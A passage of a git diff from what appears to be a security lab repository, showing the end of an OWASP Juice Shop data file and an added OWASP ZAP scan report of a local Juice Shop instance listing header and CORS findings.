too?","author":"bjoernOwasp"}]},{"name":"OWASP Juice Shop LEGO™ Tower","description":"Want to host a Juice Shop CTF in style? Build your own LEGO™ tower which holds four Raspberry Pi 4 models with PoE HAT modules running a MultiJuicer Kubernetes cluster! Wire to a switch and connect to your network to have an out-of-the-box ready CTF up in no time!","price":799,"quantity":3,"limitPerUser":1,"image":"lego_case.jpg","reviews":[{"text":"Check out the /#/photo-wall for some impressions of the assembly process!","author":"bjoernOwasp"}]},{"name":"DSOMM & Juice Shop User Day Ticket","description":"You are going to the OWASP Global AppSec San Francisco 2024? Get a ticket* for this amazing side event as well! Check the juice-packed agenda here for all the details!

*=scroll down to Elevate: DSOMM and Juice Shop User Day (Sept. 25) after clicking Get Tickets on Eventbrite. Ticket price set to only covers fees for room, AV, and catering throughout the day.","price":55.2,"deletedDate":"2024-09-26","limitPerUser":1,"image":"user_day_ticket.png","reviews":[{"text":"This is *THE* chance to \"meet the makers\" of both Juice Shop and DSOMM in the United States!","author":"bjoernOwasp"},{"text":"The DSOMM Live Assessment session will even use Juice Shop as its \"real-world\" example!","author":"timo"},{"text":"We will showcase the amazing MultiJuicer Lego Tower at this event!","author":"jannik"}]}],"memories":[{"image":"magn(et)ificent!-1571814229653.jpg","caption":"Magn(et)ificent!","user":"bjoernGoogle"},{"image":"my-rare-collectors-item!-[̲̅$̲̅(̲̅-͡°-͜ʖ-͡°̲̅)̲̅$̲̅]-1572603645543.jpg","caption":"My rare collectors item! [̲̅$̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅$̲̅]","user":"bjoernGoogle"},{"image":"favorite-hiking-place.png","caption":"I love going hiking here...","geoStalkingMetaSecurityQuestion":14,"geoStalkingMetaSecurityAnswer":"Daniel Boone National Forest"},{"image":"IMG_4253.jpg","caption":"My old workplace...","geoStalkingVisualSecurityQuestion":10,"geoStalkingVisualSecurityAnswer":"ITsec"},{"image":"BeeHaven.png","caption":"Welcome to the Bee Haven (/#/bee-haven)🐝","user":"evm"},{"image":"sorted-the-pieces,-starting-assembly-process-1721152307290.jpg","caption":"Sorted the pieces, starting assembly process...","user":"bjoernOwasp"},{"image":"building-something-literally-bottom-up-1721152342603.jpg","caption":"Building something literally bottom up...","user":"bjoernOwasp"},{"image":"putting-in-the-hardware-1721152366854.jpg","caption":"Putting in the hardware...","user":"bjoernOwasp"},{"image":"everything-up-and-running!-1721152385146.jpg","caption":"Everything up and running!","user":"bjoernOwasp"}],"ctf":{"showFlagsInNotifications":false,"showCountryDetailsInNotifications":"none","countryMapping":null}}} \ No newline at end of file diff --git a/labs/lab5/zap/auth-check.txt b/labs/lab5/zap/auth-check.txt new file mode 100644 index 00000000..a50adc1f --- /dev/null +++ b/labs/lab5/zap/auth-check.txt @@ -0,0 +1,2 @@ +token_length=732 +zap_exit=2 diff --git a/labs/lab5/zap/report-auth.html b/labs/lab5/zap/report-auth.html new file mode 100644 index 00000000..8ab01433 --- /dev/null +++ b/labs/lab5/zap/report-auth.html @@ -0,0 +1,4092 @@ + + + + +ZAP Scanning Report + + + +

+ + + ZAP Scanning Report +

+

+ + +

+ + Site: http://localhost:3000 + +

+ +

+ Generated on Fri, 8 May 2026 08:45:34 +

+ +

+ ZAP Version: 2.16.1 +

+ +

+ ZAP by Checkmarx +

+ + +

Summary of Alerts

+ + + + + + + + + + + + + + + + + + + + + + + + + +
Risk LevelNumber of Alerts
+
High
+ 		+
0
+
+
Medium
+ 		+
2
+
+
Low
+ 		+
5
+
+
Informational
+ 		+
4
+
+
False Positives:
+ 		+
0
+
+
+ + + + +

Summary of Sequences

+

For each step: result (Pass/Fail) - risk (of highest alert(s) for the step, if any).

+ + + + + + +

Alerts

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
NameRisk LevelNumber of Instances
Content Security Policy (CSP) Header Not SetMedium11
Cross-Domain MisconfigurationMedium10
Cross-Domain JavaScript Source File InclusionLow10
Dangerous JS FunctionsLow2
Deprecated Feature Policy Header SetLow11
Insufficient Site Isolation Against Spectre VulnerabilityLow10
Timestamp Disclosure - UnixLow16
Information Disclosure - Suspicious CommentsInformational2
Modern Web ApplicationInformational11
Non-Storable ContentInformational4
Storable but Non-Cacheable ContentInformational7
+
+ + + +

Alert Detail

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Medium
Content Security Policy (CSP) Header Not Set
Description +
Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/coupons_2013.md.bak
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/encrypt.pyc
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/package-lock.json.bak
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp/suspicious_errors.yml
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39
MethodGET
Parameter
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence
Other Info
Instances11
Solution +
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP +
+ + https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html +
+ + https://www.w3.org/TR/CSP/ +
+ + https://w3c.github.io/webappsec-csp/ +
+ + https://web.dev/articles/csp +
+ + https://caniuse.com/#feat=contentsecuritypolicy +
+ + https://content-security-policy.com/ + +
CWE Id693
WASC Id15
Plugin Id10038
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Medium
Cross-Domain Misconfiguration
Description +
Web browser data loading may be possible, due to a Cross Origin Resource Sharing (CORS) misconfiguration on the web server.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/ftp
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/polyfills.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/robots.txt
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidenceAccess-Control-Allow-Origin: *
Other InfoThe CORS misconfiguration on the web server permits cross-domain read requests from arbitrary third party domains, using unauthenticated APIs on this domain. Web browser implementations do not permit arbitrary third parties to read the response from authenticated APIs, however. This reduces the risk somewhat. This misconfiguration could be used by an attacker to access data that is available in an unauthenticated manner, but which uses some other form of security, such as IP address white-listing.
Instances10
Solution +
Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance).
+
+ +
Configure the "Access-Control-Allow-Origin" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.
+ +
Reference + https://vulncat.fortify.com/en/detail?category=HTML5&subcategory=Overly%20Permissive%20CORS%20Policy + +
CWE Id264
WASC Id14
Plugin Id10098
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Cross-Domain JavaScript Source File Inclusion
Description +
The page includes one or more script files from a third-party domain.
+ +
URLhttp://localhost:3000
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
Other Info
Instances10
Solution +
Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
+ +
Reference
CWE Id829
WASC Id15
Plugin Id10017
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Dangerous JS Functions
Description +
A dangerous JS function seems to be in use that would leave the site vulnerable.
+ +
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
EvidencebypassSecurityTrustHtml(
Other Info
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidencebypassSecurityTrustHtml(
Other Info
Instances2
Solution +
See the references for security advice on the use of these functions.
+ +
Reference + https://v17.angular.io/guide/security + +
CWE Id749
WASC Id
Plugin Id10110
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Deprecated Feature Policy Header Set
Description +
The header has now been renamed to Permissions-Policy.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/coupons_2013.md.bak
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/encrypt.pyc
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/package-lock.json.bak
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/ftp/suspicious_errors.yml
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/polyfills.js
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
EvidenceFeature-Policy
Other Info
Instances11
Solution +
Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header instead of the Feature-Policy header.
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Permissions-Policy +
+ + https://scotthelme.co.uk/goodbye-feature-policy-and-hello-permissions-policy/ + +
CWE Id16
WASC Id15
Plugin Id10063
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Insufficient Site Isolation Against Spectre Vulnerability
Description +
Cross-Origin-Embedder-Policy header is a response header that prevents a document from loading any cross-origin resources that don't explicitly grant the document permission (using CORP or CORS).
+ +
URLhttp://localhost:3000
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
ParameterCross-Origin-Embedder-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/ftp
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
URLhttp://localhost:3000/sitemap.xml
MethodGET
ParameterCross-Origin-Opener-Policy
Attack
Evidence
Other Info
Instances10
Solution +
Ensure that the application/web server sets the Cross-Origin-Embedder-Policy header appropriately, and that it sets the Cross-Origin-Embedder-Policy header to 'require-corp' for documents.
+
+ +
If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Embedder-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-embedder-policy).
+ +
Reference + https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy + +
CWE Id693
WASC Id14
Plugin Id90004
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Low
Timestamp Disclosure - Unix
Description +
A timestamp was disclosed by the application/web server. - Unix
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000/sitemap.xml
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1650485437
Other Info1650485437, which evaluates to: 2022-04-20 20:10:37.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1680327869
Other Info1680327869, which evaluates to: 2023-04-01 05:44:29.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1701244813
Other Info1701244813, which evaluates to: 2023-11-29 08:00:13.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1818181818
Other Info1818181818, which evaluates to: 2027-08-13 18:30:18.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1839622642
Other Info1839622642, which evaluates to: 2028-04-17 22:17:22.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1863874346
Other Info1863874346, which evaluates to: 2029-01-23 14:52:26.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1917098446
Other Info1917098446, which evaluates to: 2030-10-01 15:20:46.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence1981395349
Other Info1981395349, which evaluates to: 2032-10-14 19:35:49.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence2033195021
Other Info2033195021, which evaluates to: 2034-06-06 08:23:41.
URLhttp://localhost:3000/styles.css
MethodGET
Parameter
Attack
Evidence2038834951
Other Info2038834951, which evaluates to: 2034-08-10 15:02:31.
Instances16
Solution +
Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.
+ +
Reference + https://cwe.mitre.org/data/definitions/200.html + +
CWE Id497
WASC Id13
Plugin Id10096
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Information Disclosure - Suspicious Comments
Description +
The response appears to contain suspicious comments which may help an attacker.
+ +
URLhttp://localhost:3000/main.js
MethodGET
Parameter
Attack
Evidencequery
Other InfoThe following pattern was used: \bQUERY\b and was detected in likely comment: "//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP)</a> and is developed and maintained by voluntee", see evidence field for the suspicious comment/snippet.
URLhttp://localhost:3000/vendor.js
MethodGET
Parameter
Attack
EvidenceQuery
Other InfoThe following pattern was used: \bQUERY\b and was detected in likely comment: "//www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M0 256C0 397.4 114.6 512 256 512s256-114.6 256-256S397.4 0 256 0S0 114.6 0", see evidence field for the suspicious comment/snippet.
Instances2
Solution +
Remove all comments that return information that may help an attacker and fix any underlying problems they refer to.
+ +
Reference
CWE Id615
WASC Id13
Plugin Id10027
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
Informational
Modern Web Application
Description +
The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.
+ +
URLhttp://localhost:3000
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/build/routes/fileServer.js:59:18
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:365:14
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:421:3
MethodGET
Parameter
Attack
Evidence<script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
Other InfoNo links have been found while there are scripts, which is an indication that this is a modern web application.
URLhttp://localhost:3000/juice-shop/node_modules/serve-index/index.js:145:39
MethodGET
Parameter
Attack
